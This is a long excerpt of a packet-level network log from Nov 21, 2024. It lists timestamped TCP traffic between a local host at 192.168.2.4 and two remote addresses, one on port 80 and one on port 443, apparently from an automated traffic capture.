                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.083267927 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.083311081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.084275007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.084325075 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.084366083 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.084414959 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.085350990 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.085412979 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.085489035 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.085535049 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.086430073 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.086478949 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.086533070 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.086585999 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.087506056 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.087564945 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.087656021 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.087706089 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.088346004 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.088427067 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.088496923 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.088599920 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.088645935 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.088670969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.088685989 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.088701010 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.088715076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.088735104 CET49776443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.088742018 CET4434977613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.089679956 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.089740038 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.089749098 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.089795113 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.090789080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.090830088 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.090847969 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.090877056 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.091850042 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.091897964 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.091981888 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.092036009 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.092256069 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.092294931 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.092391968 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.092538118 CET49781443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.092555046 CET4434978113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.092938900 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.092988968 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.093039036 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.093090057 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.094026089 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.094083071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.094120979 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.094172955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.095176935 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.095226049 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.095274925 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.095355988 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.096251965 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.096308947 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.096358061 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.096411943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.097291946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.097353935 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.097377062 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.097420931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.098424911 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.098479033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.098659039 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.098711967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.099689007 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.099736929 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.099812984 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.099859953 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.100615025 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.100662947 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.100702047 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.100750923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.101674080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.101733923 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.101809978 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.101860046 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.102896929 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.102971077 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.103037119 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.103086948 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.104176998 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.104240894 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.150883913 CET4434977713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.151026011 CET4434977713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.151179075 CET49777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.151206970 CET49777443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.151221991 CET4434977713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.153914928 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.153961897 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.154030085 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.154158115 CET49782443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.154171944 CET4434978213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.233726978 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.233794928 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.233864069 CET49779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.234096050 CET49779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.234114885 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.234131098 CET49779443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.234137058 CET4434977913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.237225056 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.237261057 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.237348080 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.237502098 CET49783443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.237517118 CET4434978313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.255767107 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.255839109 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.255954981 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.256223917 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.256223917 CET49778443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.256258011 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.256283998 CET4434977813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.257551908 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.257651091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.257678986 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.257724047 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.258503914 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.258527994 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.258579016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.258594990 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.259233952 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.259289026 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.259506941 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.259589911 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.259654045 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.259670973 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.259701014 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.259819984 CET49784443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.259843111 CET4434978413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.259942055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.259993076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.260700941 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.260754108 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.260807991 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.260859013 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.261786938 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.261854887 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.261881113 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.261929989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.262959003 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.263009071 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.263040066 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.263086081 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.264046907 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.264096022 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.264273882 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.264324903 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.265034914 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.265114069 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.265162945 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.265211105 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.266205072 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.266242981 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.266258955 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.266287088 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.267225981 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.267280102 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.267333031 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.267385006 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.268321037 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.268372059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.268479109 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.268527031 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.269783020 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.269838095 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.269844055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.269892931 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.271179914 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.271212101 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.271239042 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.271254063 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.271692991 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.271744013 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.271744967 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.271792889 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.272674084 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.272731066 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.272739887 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.272789001 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.273778915 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.273844004 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.273886919 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.273933887 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.274874926 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.274935007 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.274961948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.275011063 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.275959969 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.276001930 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.276015043 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.276050091 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.277055979 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.277111053 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.277182102 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.277230978 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.278120041 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.278172016 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.278239012 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.278290033 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.279243946 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.279299974 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.279361010 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.279412985 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.280354977 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.280411005 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.280457020 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.280508041 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.281497955 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.281523943 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.281552076 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.281568050 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.282502890 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.282560110 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.282932997 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.282985926 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.283839941 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.283864975 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.283899069 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.283911943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.284840107 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.284878016 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.284894943 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.284926891 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.285738945 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.285790920 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.285855055 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.285907984 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.286887884 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.286942005 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.287197113 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.287245989 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.287956953 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.288009882 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.288053989 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.288101912 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.289010048 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.289058924 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.289181948 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.289228916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.290173054 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.290229082 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.290247917 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.290296078 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.291389942 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.291445017 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.291459084 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.291507006 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.292334080 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.292388916 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.292444944 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.292494059 CET4977080192.168.2.431.41.244.11
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.293713093 CET804977031.41.244.11192.168.2.4
                                                                                                                                                                                                                                                                                                            Nov 21, 2024 12:10:16.293767929 CET4977080192.168.2.431.41.244.11
